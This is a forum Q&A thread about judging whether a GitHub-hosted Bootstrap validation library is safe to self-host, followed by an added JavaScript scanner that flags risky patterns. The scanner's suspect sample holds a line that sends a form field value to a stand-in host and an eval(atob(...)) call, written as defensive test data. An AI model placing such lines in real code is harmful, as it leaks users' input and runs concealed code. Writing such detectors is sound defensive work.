How do I tell if code in a GitHub library is safe?

While looking for a way to tell if 2 fields match for password verification, I found this Bootstrap framework on GitHub.

https://github.com/1000hz/bootstrap-validator

It's working well when I link to it, except that it runs slowly. I'd like to copy the source code to my web host and run it from there, but how do I tell if it's safe? I don't want to compromise my server.

If anyone is using a bootstrap framework for password matches, that they know is safe, that might help, too.

Thanks,

Steve
stkoontz Asked:
 
Dillyn Barber (CIO) Commented:
Best way is to analyze the code yourself and look for any back doors. Also check how many stars it has, how active it is, what issues are reported, etc. The best thing about GitHub is you and millions of other people can view the entire source code to see what it's all about. In my opinion this looks safe, especially since it's only JS and from what I can tell it only does what it says it does; I don't see any XSS attempts. If it seems slow it might be the CDN, or your connection to the CDN.
0
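One way to start the code review the answer above recommends, as an added example that is not part of the original thread or of the bootstrap-validator project: a small triage scanner that lists the lines in a browser script where it runs dynamic code, talks to the network, injects markup, decodes hidden strings, reads cookies or storage, or embeds a URL. The rule list and both sample scripts are assumptions constructed for illustration; an empty report only narrows where to read first and does not show the file is safe.

```javascript
// Added example: flag lines in a third-party browser script that deserve a
// manual look before self-hosting. The rule list is an assumption chosen for
// illustration and is not exhaustive.
const RULES = [
  { tag: "dynamic-code", re: /\beval\s*\(|\bnew\s+Function\s*\(|\bset(?:Timeout|Interval)\s*\(\s*["'`]/ },
  { tag: "network", re: /\bXMLHttpRequest\b|\bfetch\s*\(|\bsendBeacon\s*\(|\bnew\s+WebSocket\b|\$\.(?:ajax|get|post|getJSON)\s*\(/ },
  { tag: "dom-injection", re: /\.(?:inner|outer)HTML\s*=|document\.write(?:ln)?\s*\(|createElement\s*\(\s*["'`]script/i },
  { tag: "obfuscation", re: /\batob\s*\(|String\.fromCharCode\s*\(|(?:\\x[0-9a-f]{2}){8,}/i },
  { tag: "sensitive-read", re: /document\.cookie|\blocalStorage\b|\bsessionStorage\b/ },
  { tag: "hardcoded-url", re: /["'`](?:https?:)?\/\/[^"'`\s]+/ },
];

// Returns [{ line, tag, text }] for every source line that a rule matches.
// Comment-only lines are skipped so license-header URLs stay out of the report.
function scanSource(source) {
  const findings = [];
  source.split(/\r?\n/).forEach((raw, i) => {
    const code = raw.trim();
    if (code === "" || /^(\/\/|\/\*|\*)/.test(code)) return;
    for (const { tag, re } of RULES) {
      if (re.test(code)) findings.push({ line: i + 1, tag, text: code.slice(0, 80) });
    }
  });
  return findings;
}

// Collapses findings into { tag: [line numbers] } for a quick overview.
function summarize(findings) {
  const byTag = {};
  for (const f of findings) (byTag[f.tag] = byTag[f.tag] || []).push(f.line);
  return byTag;
}

// Constructed sample: a field comparison that performs no I/O.
const BENIGN_SAMPLE = [
  "// compares two form fields",
  "function fieldsMatch(a, b) {",
  "  return a.value === b.value;",
  "}",
].join("\n");

// Constructed sample: the same function with lines a reviewer should question.
const SUSPECT_SAMPLE = [
  "function fieldsMatch(a, b) {",
  '  fetch("https://example.invalid/collect", { method: "POST", body: a.value });',
  "  eval(atob(b.dataset.cfg));",
  "  return a.value === b.value;",
  "}",
].join("\n");

console.log(summarize(scanSource(SUSPECT_SAMPLE)));
```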
 
stkoontz (Author) Commented:
Thanks for the help!

Steve
0
Question has a verified solution.
